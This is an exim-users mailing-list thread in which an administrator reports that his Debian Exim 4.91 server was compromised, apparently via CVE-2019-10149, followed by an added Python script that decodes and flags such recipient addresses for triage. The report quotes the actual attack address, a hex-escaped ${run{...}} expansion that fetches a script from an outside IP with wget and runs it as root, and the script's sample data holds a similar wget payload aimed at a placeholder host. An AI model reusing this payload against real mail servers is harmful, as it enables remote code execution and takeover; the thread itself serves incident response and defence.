You got it. Why didn't you harden your exim with the "allowed chars" change we posted here on the list, or did you?
On 11 June 2019 02:10:40 CEST, Calum Mackay via Exim-users <[email protected]> wrote:
>hi all,
>
>My mail system has just been hacked; it's running Debian unstable exim
>4.91-9
>
>Could it be CVE-2019-10149? I don't see any reports of active exploits
>yet.
>
>The reasons I suspect exim involvement:
>
>• starting today, every 5 mins getting frozen messages:
>
>The following address(es) have yet to be delivered:
>
>root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
>Too many "Received" headers - suspected mail loop
>
>• the trojan horse scripts, that were successfully installed on my
>system, with root access, are all group Debian-exim
>
>
>Luckily, it looks like the trojans did nothing more than repeated
>attempts to open up my ssh server to root logins, which I think (and
>hope) didn't actually work, so I may have been lucky, and the damage
>isn't widespread.
>
>
>ought I to be reporting this anywhere?
>
>
>thanks,
>calum.
>
>--
>## List details at https://lists.exim.org/mailman/listinfo/exim-users
>## Exim details at http://www.exim.org/
>## Please use the Wiki with this list - http://wiki.exim.org/

--
This message was sent from my Android device with K-9 Mail.
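The frozen-message address quoted above hides its command behind `\xNN` escapes, which makes it hard to read at a glance during triage. The script below is an added example (not code from this thread or from the Exim project): it decodes those escapes for a list of recipient addresses, flags any local part that contains an Exim string-expansion opener `${`, extracts the body of a `${run{...}}` expansion so a responder can read it without running it, and reports which characters from a restricted-characters set appear. The sample addresses, their host and file names, and the restricted-character set (modelled on the "Restricted characters in address" check in Exim's stock configuration) are all assumptions made for this example, not values from the original message.

```python
"""Triage helper for Exim recipient addresses carrying ${run{...}} expansions.

Added example, not part of the thread. Decodes \\xNN escapes and flags local
parts that Exim would try to expand, without executing anything.
"""
import re

# Constructed sample addresses modelled on the frozen-message report in the
# thread. Host and file names are placeholders, not the original values.
SAMPLE_ADDRESSES = [
    r"root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20http\x3a\x2f\x2fexample\x2einvalid\x2fpayload\x22}}@mail.example.invalid",
    r"postmaster@mail.example.invalid",
    r"alice+newsletter@mail.example.invalid",
]

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
RUN_EXPANSION = re.compile(r"\$\{run\{(.*)\}\}")

# Characters refused in local parts by the stock Exim configure file's
# "Restricted characters in address" ACL; the set is an assumption taken
# from that default, not from the thread.
RESTRICTED_CHARS = set("@%!/|")


def decode_escapes(text):
    """Turn \\xNN escapes back into the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def inspect_address(address):
    """Return a triage record for one recipient address."""
    local_part, _, domain = address.rpartition("@")
    decoded = decode_escapes(local_part)
    match = RUN_EXPANSION.search(decoded)
    return {
        "address": address,
        "domain": domain,
        "local_part": decoded,
        # A "${" in a local part is the tell: Exim would attempt a string
        # expansion on it wherever the recipient is used unquoted.
        "suspicious": "${" in decoded,
        "command": match.group(1) if match else None,
        "restricted_chars": sorted(RESTRICTED_CHARS & set(decoded)),
    }


def scan_addresses(addresses):
    """Inspect every address and return the list of triage records."""
    return [inspect_address(a) for a in addresses]


def count_suspicious(addresses):
    """Number of addresses that contain an expansion opener."""
    return sum(1 for rec in scan_addresses(addresses) if rec["suspicious"])


if __name__ == "__main__":
    for rec in scan_addresses(SAMPLE_ADDRESSES):
        flag = "SUSPICIOUS" if rec["suspicious"] else "ok"
        print(f"{flag:10} {rec['address']}")
        if rec["command"]:
            print(f"           embedded command: {rec['command']}")
        if rec["restricted_chars"]:
            print(f"           restricted chars: {''.join(rec['restricted_chars'])}")
```

Feed it the addresses from your own frozen-message reports (for example the "yet to be delivered" lines in bounce mails or the output of `exim -Mvh` on a frozen message) to see at once which ones carry an expansion, and treat any decoded `${run{` body as evidence to preserve, not something to re-run.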
